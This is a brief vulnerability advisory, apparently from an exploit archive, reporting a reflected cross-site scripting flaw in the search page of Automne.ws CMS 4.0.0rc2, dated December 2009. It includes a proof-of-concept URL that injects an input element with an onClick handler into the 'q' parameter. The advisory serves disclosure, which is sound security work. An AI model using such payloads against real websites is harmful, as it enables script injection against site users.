Automne.ws CMS version 4.0.0rc2 suffers from a cross site scripting vulnerability.
c424a4029f39547a86cb34da7fd7d0e5e40185cb97a765a4552337ac61dc6be5
view source
print?
Found: Dec 13th 2009
By: loneferret
Date: 13/12/2009
Product:Automne.ws CMS 4.0.0rc2
Vender: http://www.automne.ws/web/fr/242-telechargements.php
Vulnerable To: Cross Site Scripting (XSS)
PoC:
http://server/web/fr/228-recherche.php?q=<input type="Submit" name="Delete" value="ClickMe"onClick="alert(1)">